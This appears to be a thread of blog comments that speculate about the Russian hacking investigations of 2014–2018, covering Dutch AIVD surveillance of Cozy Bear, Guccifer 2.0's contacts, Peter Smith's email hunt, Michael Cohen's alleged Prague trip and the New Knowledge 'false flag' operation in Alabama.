Not only that, but they apparently hacked a security camera for the hallway of the building that watched who entered and exited the room where the hackers worked and actually watched the hackers come and go from work. And it all started around mid-2014. The Dutch informed the NSA, and they jointly fought against Russian And those battles reportedly include the initial 2015 hack of the DNC’s server. The Dutch hackers literally watched the hack in real-time and the NSA was made aware of this early on. Again, it’s a pretty remarkable story.
So at the same time this Internet Research Agency trolling team was allegedly getting up and running on its US operations in 2014 and 2015 and deleting email account over worries of getting caught, there was apparently a very active hacking war taking place between the ‘Cozy Bear’ attacker and NSA defenders on numerous US government systems. And Dutch hackers were watching and assisting the NSA the whole time. Literally watching the hackers over security cameras in some cases. That’s what was reported last month in a Dutch newspaper based on the accounts of six anonymous US and Dutch individuals familiar with the story.
But before we take a look at that article, first recall the earlier reporting about Robert Johnston who led the CrowdStrike investigation into the DNC server hack. Back in the summer of 2015, Johnston was a captain in the Marine Corps leading the newly formed Cyber Protection Team 81 for the US military. And according to Johnston, the ‘Cozy Bear’ hack was done around May of 2015 and that it was part of a much large, and very ‘noisy’, hacking campaign that targeted 50,000–60,000 people. Johnston characterized this as a major change in tactics for Russian government hackers. According to Robert Johnston, it was as if the hackers didn’t care who was watching them. Also recall that when the ‘Fancy Bear’ hack was first reported on in July of 2016, US intelligence officials reportedly suspected that it was intentionally done to leave ‘Russian hacker’ fingerprints all over the hack in show that Moscow is a “cyberpower” that Washington should respect. That’s what was reported at the time. It’s important pieces of context for both the story of the Internet Research Agency trolling campaign and the Dutch hacker intrigue.
Also note that it was indeed reported in March of 2015 that the State Department did indeed experience its worst hack ever in the Fall of 2014. And that hack, and a 24 hour battle between ‘Cozy Bear’ and the NSA to expel them from the State Department’s servers, is at the center of the following report about the Dutch hackers.
So, with all that in mind, behold the remarkable story of the Dutch hackers hacking ‘Cozy Bear’ and watching the initial DNC hack in real-time:
“It’s the summer of 2014. A hacker from the Dutch intelligence agency AIVD has penetrated the computer network of a university building next to the Red Square in Moscow, oblivious to the implications. One year later, from the AIVD headquarters in Zoetermeer, he and his colleagues witness Russian hackers launching an attack on the Democratic Party in the United States. The AIVD hackers had not infiltrated just any building; they were in the computer network of the infamous Russian hacker group Cozy Bear. And unbeknownst to the Russians, they could see everything.”
And there was have it: in the summer of 2014 Dutch hackers working for the AIVD apparently hacked into a university building next to the Red Square and in doing so just happened to stumble upon the headquarters of ‘Cozy Bear’. And this hack wasn’t discovered by the Russians for at least year, allowing the hackers to watch these Russian hackers launch an attack at the Democratic Party. It’s worth recalling at this point that Robert Johnston, the Marine-turned-Crowdstrike cyber expert, said he suspected that the 2015 hack of the Democratic Party was actually just one part of that much larger “noisy” wave of phishing attacks that targeted 50–60 thousand people in the summer of 2015.
So it’s unclear what exactly the above report is implying when they suggest that the Dutch hackers watched the attack on the Democratic Party happen. But according to this report, these Dutch hackers warned the US that this was happening, providing “evidence of the Russian involvement in the hacking of the Democratic Party”, according the six anonymous sources:
And these same sources assert that the evidence provided by the Dutch is the basis for the ‘high confidence’ that American intelligence agencies have that the Kremlin was indeed behind the hack:
And part of that ‘high confidence’ comes from actually hacking the security camera of the hallway in this building that led to the room where the hackers worked, allowing the Dutch hackers to literally watch the ‘Cozy Bear’ hackers come and go:
So using this inside knowledge, the AIVD watch the ‘Cozy Bear’ hackers do their work. But when it came to the hack of the US State Department in November of 2014, they didn’t just watch. They also informed the NSA of the hack and directly coordinated with the NSA to help repel the hackers over a 24 hour period that’s described as a rare cyber battle:
And not only do the Dutch hackers manage to hack the ‘Cozy Bear’ security cameras and watch the hackers in real-time, but they also used those images to deduce which Russian intelligence service the hackers worked for: the SVR, Russian’s external intelligence agency. It’s an interest twist because, up until now, ‘Cozy Bear’ has always been referred to as the hacking team for the FSB, Russia’s internal intelligence agency. But according to the Dutch, who allegedly hacked the hackers, ‘Cozy Bear’ is working for the SVR. And this has apparently been known for years. It’s an interesting discrepancy in the reporting around ‘Cozy Bear’:
And at the end of this report we learn that the Dutch intelligence agencies were pretty pissed about this being reported at all. We also learn that the hack of ‘Cozy Bear’ lasted from 1 to 2.5 years. So the hack ended some time around the summer of 2015 (around the time of the DNC server hack) or the maybe as last as the Fall of 2016. We don’t get to know. But the Dutch intelligence officers would have preferred none of this was ever known:
So that was the remarkable Dutch report on the even more remarkable alleged hacking of ‘Cozy Bear’. A hack so deep that there’s apparently security camera footage of the actual hackers. And a hack that not only allowed the Dutch to provide the NSA real-time information during a cyberbattle over the US State Department in November of 2014 but also allowed the Dutch team to was the Russian hackers launch the attack against the Democratic Party in the summer of 2015. That’s the story.
And it’s a story that raises a number of rather significant question about the ‘Russian hacks’ and the evidence US investigators are working: First off, if the NSA was informed of the hacks against the Democratic Party in May of 2015 when it happened, why did the FBI wait until September of 2015 to inform the DNC that they were hacked and then do little to nothing about ensuring the DNC take that warning seriously until March of 2016? It’s not a new question, but in the context of the reports about the Dutch hackers and the Internet Research Agency troll campaign both going back to 2014 it’s a much bigger question.
And then there’s the question about that report from June of last year of the evidence the US had that the Kremlin was indeed behind the hacks. And remember how that evidence came down to a mole in the Kremlin along with “critical technical evidence” from another country? And remember how the report indicated that, “because of the source of the material, the NSA was reluctant to view it with high confidence”? Well, was that country providing the evidence that the NSA viewed with reluctance the Netherlands?
“Some of the most critical technical intelligence on Russia came from another country, officials said. Because of the source of the material, the NSA was reluctant to view it with high confidence.”
And that’s all we learned about that “most critical technical intelligence” at the time. It was critical, and the NSA was reluctant to view it with high confidence. And there’s never been an indication of which country it was that provided this intelligence. So was it the Netherlands? If so, that’s quite a surprise given the the story about the NSA working closely and enthusiastically with the Dutch hackers. Also recall that the second hack of the DNC Server was allegedly carried out by a different Russian hacking team, ‘Fancy Bear’, and that hack didn’t take place until March of 2016. So it’s very possible the Dutch hackers would have had no information about that hack even if they really did hack into the ‘Cozy Bear’ team. But given that we still have no idea which country provided that “critical technical intelligence” it’s a question we need to ask.
So, all in all, if you accept at face value these twin stories of the troll farm activities and an aggressive hacking campaign both starting back in 2014, it might be easy to conclude that this is substantial circumstantial evidence that the 2016 ‘Fancy Bear’ hack of the DNC that actually led to the release of those hacked documents really was just an extension of some sort of Kremlin-directed hacking campaign.
But that’s conclusion leaves out some rather important details. And one of those details is highlighted by these twin stories: that there was extensive awareness within the US government of an apparent Russian hacking/trolling campaign starting 2014 and 2015. And that awareness would have included knowledge that the DNC had already been hacked in 2015. So if you were looking for a reasons why the GOP or its right-wing allies, for instance, might decide to try and hack the DNC in 2016 themselves and leave all sorts of ‘fingerprints’ making it look like ‘the Russians’ did it, you could hardly come up with a better backdrop than the situation that had emerged in 2014 and 2015.
Don’t forget that Newt Gingrich, Judicial Watch, and Barbara Ledeen — wife of Michael Ledeen who coauthored a book with Michael Flynn — put together a team in 2015 to seek out Russian hackers with Hillary’s emails.. In other words, the idea of ‘Russian hackers’ hacking the Democrats was already well on the GOP’s mind in 2015.
Also don’t forget that the May 2015 hack of the German Bundestag which was formally blamed on the Kremlin in January of 2016 had technical details about the hack published in 2015, and those same technical details inexplicably showed up in the malware found from the second 2016 ‘Fancy Bear’ hack.
So how much awareness was there in 2015 within the US political establishment, and specifically the GOP, that there was an aggressive hacking campaign attributed to ‘Cozy Bear’ and an aggressive (if ineffectual) trolling campaign being carried out by the Internet Research Agency? We know the NSA knew about the ‘Cozy Bear’ hacking campaign. And the FBI clearly found out at some point in 2015. So who else in the US government knew about this? Did GOPers in congress know? Because if the information revealed in this Mueller indictment and the story of the Dutch hackers was something more widely, if quietly, known within the US political establishment, then it would also have been widely, if quietly, known that hacking the Democrats and making it look like ‘the Russians’ did it was very much an option. Again, don’t forget that, as atypically ‘noisy’ as the ‘Cozy Bear’ hacks of 2015 was for a Russian government hacking campaign, that’s nothing compared to how atypically ‘noisy’ the ‘Fancy Bear’ hack of 2016 was. Was that ‘noisiness’ of the 2016 ‘Fancy Bear’ hack really the Kremlin deciding to prominently inject itself into the US 2016 election, thus ensuring a subsequent hysteria about ‘Russian meddling’ and a massive elevation of tensions? Or was it a crime of opportunity carried out by a political opponent of the Democrats made to look like ‘the Russians’ by taking advantage of the knowledge that there was already US government concerns over Russian trolls and hackers?
As the Mueller indictment indicated, those Russian trolls didn’t appear to want to get caught. And we’re told they were under Kremlin direction. So why did the hackers we’re told were under Kremlin direction so desperately want to get caught? It’s a central question raised by this entire #TrumpRussia saga that has yet to be meaningfully answered.
Cybersecurity researcher John Bambenek just revealed something rather noteworthy about Guccifer 2.0: Bambenek apparently had a two month long back and forth with Guccifer 2.0 from mid August 2016 to mid-October. And he got a number of Democratic party documents sent to him by Guccifer 2.0 during this period.
Here’s the really interesting part: all he had to do was reach out to Guccifer 2.0 using Twitter’s “Direct Messages” (DMs). He pointed out that he’s a Republican — he’s a former Illinois state senate candidate and currently serves on the state’s board of higher education as well as its community college board — and asked Guccifer 2.0 for documents that would make a big impact. That was apparently all that was required for him to actually receive some documents.
Keep in mind that this isn’t the first time we’ve heard reports about people simply reaching out to Guccifer 2.0 and getting a response. Or even documents. Recall how the operation by GOP operative Peter Smith that set out to find Hillary Clinton’s hacked emails on the dark web ended up reaching out to “Guccifer 2.0”, who told Smith’s team that they should contact neo-Nazi hacker Andrew “weev” Auernheimer. And then the was the Florida GOP operative Aaron Nevins got 2.5 GB of Democratic Party documents from Guccifer 2.0 simply by asking for them. And, of course, there was Roger Stone’s messages to Guccifer 2.0 over Twitter DM too.
So it’s not a new revelation to learn that random GOPers people could simply reach out to Guccifer 2.0 and end up with documents. But this is one more example of that so it raises the obvious question: Just how many GOPers other simply asked Guccifer 2.0 for documents and received them? Was this an open secret?:
“For a two month period in late 2016 — not long after the infamous Guccifer 2.0 online persona first appeared online and began leaking data to the media and via Twitter from stolen documents from the Russian hacks of the Democratic National Committee (DNC) and Democratic Congressional Campaign Committee (DCCC) — Bambenek reached out to Guccifer 2.0 via a Twitter direct message (DM), using his real name and actual party affiliation as an Illinois Republican.”
A message to Guccifer 2.0 over Twitter was all it took. So anyone in the world could have done what Bambenek did. Especially since it appears that Guccifer 2.0 didn’t even both to look into who Bambenek was and discover that he was a cybersecurity research with Fidelis Cybersecurity:
It’s worth noting that Fidelis Cybersecurity was one of the firms that quickly backed up Crowd Strike’s early conclusion that the DNC hack was a Russian operation back in June of 2016. So while it’s possible Guccifer 2.0 didn’t see all the clear signs that Bambenek was a Fidelis employee, it’s also possible Guccifer 2.0 saw this early on and saw it as an opportunity to further the ‘Russian hacker’ narrative by directly interacting with someone from the cybersecurity industry.
Although based on Bambenek’s recounting of their interactions, if Guccifer 2.0 was intentionally pushing a narrative through Bambenek, that narrative appears to be that they were someone who lacked any meaningful political sophistication or knowledge of which documents might prove politically impactful. and that’s why it’s entirely unclear what it was about Bambenek’s interactions with Guccifer 2.0 that led him to his conclusion that Guccifer 2.0 was a Russian government operative:
So what did Bambenek do with the documents he received? Apparently he handed them over to the FBI:
“Bambenek in turn handed each message and document he obtained to the FBI.”
So it seems like the FBI had to be aware of Guccifer 2.0 trying to hand documents directly to Republican operatives at some point between mid-August and mid-October of 2016. That seems like a significant revelation just in terms of who knew what when.
And you have to wonder what this was all about when Bambenek says, “One of the things we were doing as researchers was giving him real-time feedback on his tradecraft mistakes ... then he stopped making metadata mistakes” in his document dumps:
So was Bambenek referring to the cybersecurity community’s early discovery of things like Cyrillic text in the meta-data, which was discovered a day after the initial June 15th, 2016, document dump? Or was Bambenek referring to some other form of real-time feedback? It’s unclear.
So, all in all, the Russian government decided to hand off the crucial public relations work a high-stakes foreign interference operation to a “low-level operative not closely supervised by the Russian government.” That’s according to John Bambenek from Fidelis Cybersecurity, one of the first firms to ‘confirm’ Crowd Strike’s initial attribution.
And Bambenek bases this conclusion, in part, on his direct interactions with Guccifer 2.0. Direct interactions that ANY random person could have potentially had with Guccifer 2.0. And, again, that raises the question: how many other GOPers were in contact with Guccifer 2.0 over this period? Because it’s not like there was a lot stopping them.
Here’s an article about how the Obama administration ordered the various people the US government who were developing counter-measures against the ‘Russian hackers’ to stand down in favor or a different approach. And the article contains some interesting new data points worth keeping in mind regarding the bizarre timeline of the US government’s response to the DNC hacks.
First, recall how the US reportedly detected the (initial) hacking of the DNC servers in May of 2015. It was surprisingly ‘noisy’ according to US cybersecurity officials, meaning it didn’t seem like the hackers were trying to hide what they were doing at all. And recall how the FBI didn’t inform the DNC of this initial hack until September of 2015, but the outreach to the DNC was so unusual (just a phone call to a DNC IT person) that the DNC didn’t think it was a real tip and didn’t know it was actually hacked until March of 2016 when the FBI agents physically showed up at the DNC.
So there’s a remarkable period, from around May of 2015 to March of 2016, where the US government knew about these hacks, but the DNC effectively didn’t. Well, according to the following article, there’s another set up people who were informed about the hacks in late 2015. It’s not a surprising set of officials to be informed about the hacks, but still noteworthy given the number of Democrats or people with ties to the Democratic party that would have known about this: State Department officials, including Victoria Nuland, were informed about the DNC hacks in December of 2015 and tasked with developing a US response:
“The view that the Obama administration failed to adequately piece together intelligence about the Russian campaign and develop a forceful response has clearly gained traction with the intelligence committee. Sen. Mark Warner, D‑Va., the ranking Democrat on the panel, said in an opening statement that “we were caught flat-footed at the outset and our collective response was inadequate to meet Russia’s escalation.””
A forceful cyber-response against Russia by the US in 2016 was necessary: That appears to be the consensus at the Senate intelligence committee.
And Victoria Nuland, the assistant secretary of state for Europe during the Obama adminstration (and someone who appeared to play an active role promoting the Maidan protests in Ukraine in 2014), not only agrees with that assessment but was helping to formulate a US response back in 2016. According to Nuland, she was briefed on the ‘Russian hacking’ as early as December 2015, long before senior DNC officials were even aware of it (due to the FBI’s inexplicably poor job of informing the DNC):
But Nuland wasn’t just informed about the hacks. She and other State Department officials were also authorized by then Secretary of State John Kerry to develop proposals to deter the Russian hackers:
And some of those proposed cyber-responses included actions like denial of service attacks on Russian news sites (presumably RT). For some reason this was deemed to be a form of deterrence, even though it wouldn’t actually be a deterrence unless the US made it clear it was behind the attack and would have probably become a propaganda bonanza for the Kremlin:
But those response plans were ultimately put on hold. This was in part over concerns that it could provoke a full scale cyber war but also due the GOP congressional leadership refusing to sign on for a bipartisan US government response:
Nuland and Senator Collins also discussed another previously undisclosed alleged Russian government covert action that during her Senate testimony: Collins brought up how FBI officials advised the Senate intelligence committee in the summer of 2016 thatR ussian diplomats were traveling around the country in areas they were not permitted to visit under diplomatic protocols. Collins was told at the time that this was apparently to collect intelligence. Nuland agreed. There’s no information on what kind of places these diplomats visited or what kind of intelligence they are suspected of collecting, but all parties involved have apparently concluded that this must have been a Kremlin cover action:
So now you know: Victoria Nuland, wife of Project for the New American Century co-founder Robert Kagan, was helping to develop the US response to the hacks along with a number of other State Department officials and she learned about the hacks in December of 2015, months before the DNC itself belated learned about it.
Here’s an interest followup on the mystery behind the operation set up by GOP financier Peter Smith to find and obtain Hillary Clinton’s hacked emails on the “dark web”. Recall how this operation appears to have involved a number of Trump campaign members ‑Michael Flynn, Steve Bannon, Kellyanne Conway, and Sam Clovis — according to the documents incorporating one of the companies set up for this operation. Also recall how they reached out to Alt Right troll Charles Johnson, who referred to other Alt Right operations with the same goal. Johnson reportedly advised Smith to contact Andrew ‘weev’ Auernheimer about finding the emails.
Such an operation presumably cost money to run especially if the hacked emails are discovered and hackers are asking for money. So it’s interesting to learn that the FBI and congressional investigators were looking into a number of suspicious financial transactions done by Smith during this period. Specifically, it sounds like the investigators looked over the documents provided by Smith’s bank, Northern Trust, showing 88 suspicious cash withdrawals totaling about $140,000 between January 2016 and April 2017. The withdrawals were labeled “suspicious” when the purpose couldn’t be determined.
Keep in mind that Smith had significant enough health problems that he he ended up committing suicide last May, so there were probably quite a few reasons for the guy to be withdrawing money once it was clear he was dying. But also recall that the suicide note he left indicated that his health became problematic in January of 2017. So all those unexplained cash withdrawals throughout 2016 can’t be easily explained away by Smith’s terminal illness.
Was all that $140,000 spent on this project to get Hillary’s emails? That’s unclear. Was some of the money used to pay hackers for information? Well, according to a person with direct knowledge of Smith’s project, Smith stated that he was prepared to pay hackers “many thousands of dollars” for Clinton’s emails — and ultimately did so. So while we don’t know how much of that $140,000 was spent on this email project and we don’t know what it was spent on, it sure sounds like Smith’s operation was spending thousands of dollars to pay someone for something:
“In one of the most intriguing episodes of the 2016 presidential campaign, Republican activist Peter W. Smith launched an independent effort to obtain Hillary Clinton’s emails to help defeat her and elect Donald Trump. His quest, which reportedly brought him into contact with at least two sets of hackers that he himself believed were Russian, remains a key focus of investigations into whether the Trump campaign colluded with the Kremlin.”
Well that’s kind of good to year if true: Smith’s question for Hillary’s emails remain a “key focus of investigations.” Given all the Trump-affiliated people involved it would have been rather obscene if this wasn’t a key focus, as is also the case given the suspicious timing of some of these financial transactions. Especially given that one of the people involved with the project is saying that Smith state he was prepared to pay the hackers “many thousands of dollars” for Hillary’s emails, and ultimately did so:
One other source of possible expenses that Smith would have had to spend money on is setting up the company to actually carry out this work, KLS Research:
And it was money moved from KLS Research accounts to Smith’s personal accounts that appear to have caught investigators’ attention. Soon after Labor Day in 2016, Smith apparently had an operational plan for vetting and acquiring the emails he claimed were offered to him over the Dark Web by people he believed to be Russians. That included a little more man than $4,900 sent to an LLC controlled by a private real estate company. So it would be interesting to learn the name of that company:
And when Smith’s bank was subpoenaed, investigators learn about 88 suspicious transactions, worth about $140,000, that Smith’s bank couldn’t find an reason for from January 1 2016 to April 2017:
And this is all why Smith is apparently still an important figure for investigators. We have all the elements of the crime — claims of contact with hackers that allegedly had Hillary’s emails, shady financial transactions, and contacts with the Trump campaign — so it would be pretty amazing if he wasn’t seen as an important figure:
Unfortunately, Smith committed suicide and won’t be answering any more question. But it sounds like Mueller’s team did interview other people involved with Smith’s operation, with an eye on determining whether or not Michael Flynn was involved:
Considering that Flynn has been a cooperating witness for the Mueller investigation, it’s going to be interesting to see what happens if evidence that Flynn worked directly on this operation comes out while Flynn denies any involvement.
Anyway, that all appears to indicate that Peter Smith’s operation is still very much a topic of interest to investigators and those investigators have a number of financial transactions to assist in that investigation.
Of course, it would be absurd if investigators weren’t still looking into this. Along those lines, we still have no indication that the other GOP operation to obtain Hillary Clinton’s hacked emails on the dark web — the operation involving Barbara Ledeen, Newt Gingrich, and Judicial Watch — is also still being looked into by investigators.
There’s no shortage of speculation about the legal threat Michael Cohen presents to President Trump following his recent decision to ‘flip’ and offer to assist the Mueller investigation. And it’s well founded speculation. Cohen was apparently deeply involved with everything from the Trump Tower Moscow initiative led by Felix Sater to the Ukrainian ‘peace plan’ proposal (also led by Felix Sater).
Then there’s Cohen’s familial connections. Like how his Ukrainian wife is the daughter of some mob connected Ukrainians. Cohen’s Uncle owned a club that was patronized by leading Russian and Ukrainian mafia figures from the 70’s — 90’s. Cohen’s father-in-law, Felix Shusterman, is a Ukrainian immigrant to the US who was involved with the mafia and the Trump organization (Trump’s hiring of Cohen was seen as a favor to Shusterman). And Cohen’s brother’s father-in-law was Alexander Oronov, the recently deceased Ukrainian oligarch with a number of connections to Ukrainian figures including Andrii Artemeneko. Cohen clearly knows A LOT that could be of interest to anyone investigating #TrumpRussia.
And as the following article notes, there’s one key area of the #TrumpRussia investigation that Cohen allegedly was intimately involved with according to the Steele Dossier that would put Cohen at the center of the alleged conspiracy between the Trump campaign and the Kremlin to collude over the hacks of the Democrats: The dossier alleged that Cohen took over the role of negotiating with the Kremlin after Paul Manafort left the Trump campaign in August of 2016, and that Cohen traveled to Prague in August or September of 2016 and met with Kremlin representatives where they hashed out a deal to pay off the ‘Romanian hackers’ for the hacks.
The article notes that there was a report back in April that the Mueller team had uncovered evidence of such a visit, but the article also notes that there’s been no following reporting indicating whether or not this report was true.
So the question of whether or not Michael Cohen was in Prague in 2016 remains an open question. And as the follow article points out, Cohen’s attorney Lanny Davis recently explicitly denied that Cohen has ever traveled to Prague. So while Cohen appears to have had a significant change of heart in terms of his willingness to work with investigators, the question of whether or not Cohen will end up validating or contradicting the Steele dossier allegations about him appears to be at least somewhat answered: he’s going to contradict the dossier’s claims. At least some of them.
It’s also worth noting that, if the dossier’s claims about a meeting in Prague to work out the payment to the hackers is true, that would be one of example of how this has to be one of the the stupidest intelligence operations in history. Think about it: the Kremlin and the Trump team are engaged in a high stakes secret negotiation involving the high profile hacking of the Democrats, and for some reason they decided that these Russian government hackers needed to be paid off by the Trump team in order to execute this extremely risky operation. Really?! Why?! Why couldn’t the Russian hacker team get paid off by the Kremlin like they are presumably already being paid if they are Russian government hackers?
Also recall how Mueller’s recent indictment of 12 GRU officers over the hacks specifically detailed how these officers planned and executed the phishing campaigns and deployment of the malware (albeit, with scant claims of evidence to back up those detailed allegations). There were no third-party cut-out hackers referenced in the indictment. So if the Steele dossiers claims about Cohen going to Prague to negotiate a payout to the hackers is true, and those hackers were actually GRU agents, that would defy logic unless the Kremlin was actually trying to goad the Trump team into creating an evidentiary trail to be followed later. Which would be an odd thing to do of they were colluding with the Trump team in order to see a change in US policy towards Russia.
So it’s going to be interesting to see what, if any, hacking related revelations emerge from Michael Cohen ‘flipping’. But given that even the Mueller indictment itself contradicts the Steele dossier, we probably shouldn’t expect the newly cooperative Cohen to confirm many of that dossier’s allegations:
“In the hours after Donald Trump’s former attorney Michael Cohen pleaded guilty to various crimes on Tuesday, his attorney Lanny Davis appeared on a number of television shows and granted other interviews centered on a common theme: Cohen has information that could be of interest to special counsel Robert S. Mueller III.”
It was quite a tease: Lanny Davis goes on TV promising that Michael Cohen has information that could be of interest to Robert Mueller. Because of course he would. He’s Michael Cohen.
One of the areas that Cohen could provide some devastating testimony against Trump is whether or not Trump personally knew about the notorious June 9th, 2016, meeting involving the Russian delegation offering ‘dirt’ on Hillary Clinton. And he allegedly does indeed have information about whether or not Trump knew in advance:
Keep in mind that the question of whether or not Trump knew in advance of this meeting was more or less answered by Trump himself two days before the meeting. Recall how Trump gave a speech on June 7th, 2016, where he talked about how all sorts of new dirt on Hillary Clinton would be coming out soon. This was just two days before the June 9th meeting, and the original emails to Donald Trump, Jr. that set up the meeting explicitly said the Russian government wanted to hand over dirt on Hillary Clinton. So the circumstantial evidence that Trump at least thought this meeting was was going to involve the Russian government handing over dirt on Hillary is pretty overwhelming. The big question is what actually transpired at that meeting and whether or not it involved the hacks.
And then there’s the allegations from the Steele dossier. Allegations that Michael Cohen traveled to Prague in order to have a secret meeting with Kremlin representatives where they discussed having the Trump team pay off the “Romanian hackers”:
It’s also worth asking why this discussion of how to pay off the hackers (as absurd as that is) didn’t come up during the June 9th meeting if that meeting was indeed about the hacked documents. We can add farcical levels of inefficiency to the many farcical aspects of this alleged Kremlin intelligence operation.
And yet there was indeed a report from back in April saying that the Mueller team did indeed have evidence of Cohen making a trip to Prague. The only problem is there’s been no followup on that report and Lanny Davis flatly denied it:
So if Cohen does end up becoming a significant witness in this investigation, while continuing to contradict key claims about him in the Steele dossier, it’s going to be interesting to see how that affects that how the rest of the claims in that dossier are interpreted.
It’s also going to be interesting to see how the inevitable future movies portraying the alleged events of the #TrumpRussia conspiracy depict this allegedly intelligence operation given all the farcical aspects of it. Will it be portrayed as farcical spy comedy or a serious spy movie that happens to include one massive intelligence mistake after another? We’ll see, but the spy farce scripts sort of writes themselves at this point.
Well that’s interesting: the US Senate Intelligence Committee recently released a report on its assessment of the role social media operations allegedly directed by the Kremlin played in the 2016. The report was written by a small cyber security firm, New Knowledge. New Knowledge’s co-founder, Ryan Fox, previously worked the NSA and its other co-founder, Jonathan Morgan, previously served as a Special Advisor to the State Department.
And now, just a few days after the release of this report, we learn about a different report involving New Knowledge. That’s the report of a secret effort to ‘study’ the impact of Russian social media bots during the 2017 Senate special election in Alabama that saw Democrat Doug Jones eek out a victory of Roy Moore after the wave of revelations about Moore’s history of dating young teenage girls as an adult. The ‘study’ allegedly focused on the understanding how the tactics used by Russian social media manipulation campaigns operated.
But what we’re learning is that New Knowledge group may have actually created a large number of fake Russian bot accounts and had them follow Roy Moore for the purpose of a create a ‘Russian bots are help Moore’ meme to energize Democrats and depress Republicans. According to the report, “We orchestrated an elaborate ‘false flag’ operation that planted the idea that the Moore campaign was amplified on social media by a Russian botnet.” In addition, the report takes credit for “radicalizing Democrats with a Russian bot scandal”. And it was indeed the case that Roy Moore’s campaign suddenly experience a big spike on Twitter accounts seemingly originating from Russia. Moore’s campaign blamed it on a dirty trick by Jones at the time.
And while the report doesn’t admit to creating those ‘Russian bot’ twitter accounts in the report, there is evidence that the project had the capacity to direct thousands of fake twitter accounts. The evidence comes from another aspect of this project: the project created a fake Facebook page that posed as conservative Alabamians and use that page to endorse a third-party conservative candidate. The particular candidate the fake group endorsed was Mac Watson. Watson apparently contacted the fake Facebook group and the group responded by saying it would be inclined to support Watson and agreed to “boost” his candidacy and was “treated as an advisor and the go-to media contact for the write-in candidate.” The project claims it was what got interviews in The Montgomery Advertiser and the Washington Post for Watson’s campaign, so it sounds like it really was working to help the Watson campaign.
Here’s the part that makes it appear that this group was creating fake ‘Russian bot’ accounts: shortly after Watson agreed to work with this fake Facebook group, Watson’s twitter followers jumped from about 100 to about 10,000. So it would appear that this group was in control of thousands of fake twitter accounts.
The project appears to have been financed by Reid Hoffman, the billionaire co-founder of LinkedIn who tends to support Democrats. Hoffman was part of the “Pay Pal Mafia” of wealthy tech investors who were initially involved with Pay Pal (the company that earned figures like Elon Musk and Peter Thiel their initial wealth) The overall budget for the project was around $100,000. It’s worth noting that, while Hoffman supports the Democrats, he’s the type of billionaire supporter of the Democrats with a track record of scoffing at things like the New Deal and government regulation.
There’s no indication so far that that Jones’s campaign was involved in this and Jones is now calling for an investigation what New Knowledge was up to.
So, to summarize, the cybersecurity firm that wrote the Senate Intelligence Committee’s recent report on the role Kremlin disinformation operations played in the 2016 election appears to have waged a disinformation operation of its own pretending to be a Kremlin operation. And that disinformation campaign may have involved the creation of thousands of fake ‘Russian bots’:
“An internal report on the Alabama effort, obtained by The New York Times, says explicitly that it “experimented with many of the tactics now understood to have influenced the 2016 elections.””
So the New York Times gets its hands on an internal report by ‘the Alabama project’, and we learn that it involved Jonathon Morgan, the CEO of New Knowledge, the same company that just wrote the Senate Intelligence Committee’s report on Russian social media meddling. And Morgan reached out to Renée DiResta, who would later join New Knowledge and who was the lead author on the Senate report:
And in this project report, they explicitly brag about orchestrating “an elaborate ‘false flag’ operation that planted the idea that the Moore campaign was amplified on social media by a Russian botnet.” And yet Morgan is acting like he has no recollection of this and assures us that “The research project was intended to help us understand how these kind of campaigns operated.” So it appears that the spin for this false-flag Russian operation is to portray it as a research effort to understand how Russian operations work:
But it doesn’t look like the project was limited to “an elaborate ‘false flag’ operation that planted the idea that the Moore campaign was amplified on social media by a Russian botnet.” They also set up a face Facebook group of Alabama conservatives and tried to use it to promote a third-party conservative candidate. And when they found a candidate to back, Mac Watson, that candidate suddenly saw his twitter following jump from 100 to 10,000 followers. So the Alabama project was clearly working with thousands of fake Twitter accounts:
The report doesn’t indicate that the project was actually behind the alleged Russian bot accounts that suddenly started following Roy Moore. And we do know that the story of Russian bots following Moore was indeed a new story at the time. But it’s hard to think of any other meaning being the report’s boasting of executing “an elaborate ‘false flag’ operation that planted the idea that the Moore campaign was amplified on social media by a Russian botnet” than to interpret that as an admission that those ‘Russian bot’ accounts were actually under the control of New Knowledge:
Importantly, it also appears that this operation was being run independently of the Jones campaign and the Democratic party. Instead, it was financed by Silicon Valley billionaire Reid Hoffman:
It’s also worth noting that, despite spending $100,000 on the project, their chosen third party candidate only got a few hundred votes. So it doesn’t look like their face Russian bot activity was very successful:
Also recall that $100,000 was the presumed budget of the Internet Research Agency’s budget for purchasing Facebook ads in 2016.
So it would appear there’s a much more to learn about what exactly New Knowledge was up to with its Alabama Project disinformation campaign. After all, if it turns out the Russian bots that suddenly started following Roy Moore were actually under the control of New Knowledge, that would raise the obvious question of how many other reports of Russian bot activity are actually some other group. Not that we didn’t already know that spoofing ‘Russian bots’ is a trivial exercise, but confirmation that such activity is taking place would still be new.
It would also appear that the Senate Intelligence Committee’s report on Russian disinformation operations in 2016 could probably use a disinformation audit of its own.
@Pterrafractyl–
Brilliant analysis, and couched very intelligently.
The whole Russian/bot/twitter/Facebook/Instragam supposed IRA effort is suspect.
Beyond that–I am going into the depth on the subject of “Destiny Betrayed” to give people a real hands-on feel for the depth of lying that the Powers That Be routinely manifest.
Keep up the great work!
Dave Emory
Was Michael Cohen really in Prague in 2016 for a clandestine meeting with Kremlin operatives, as was alleged in the Steele dossier? That’s the assertion of a recent McClatchy report. Specifically, there are four separate anonymous sources telling McClatchy that Mueller’s probe does indeed have evidence that Michael Cohen was in Prague in August or September of 2016. All four sources independently claim that evidence exists that Cohen’s cellphone ‘pinged’ a cell tower in the Prague area during that time.
In addition, two of the sources claim that an unnamed Eastern European intelligence agency eavesdropped on Russian officials talking to each other, where one Russian official informed the other that Cohen was in Prague.
It’s a pretty explosive report. And if turns out it’s an accurate report it would go a long way towards establishing the veracity of the Steele dossier, especially since the claims about Cohen’s alleged trip to Prague were among the first to be disputed.
But as we’re going to see, this story and its explosive claims are already being met with skepticism. And we’re also going to see, the sources for this report appear to have been trusted sources that these reporters have been relying on for a lot of other #TrumpRussia reports. Plus, it doesn’t appear that the journalists for this report have first hand knowledge of the evidence. Instead, they’ve talked to people who claim to have knowledge of the evidence. And no information about when this cell phone tower ping event or the eavesdropped conversations took place. Although we are told that the cell phone evidence was only discovered “sometime after Cohen apparently made his way to the Czech Republic”.
If the allegations are true it’s explosive for obvious reasons. But if it turns out that this is another instance where “anonymous sources” with intelligence connections are feeding what appears to be BS stories to the press — like the story of Paul Manafort making secret trips to the London embassy to visit with Julian Assange — that’s pretty explosive too because it raises the question of what other stories have relied on these same sources. So it’s a pretty explosive story whether or not it’s true:
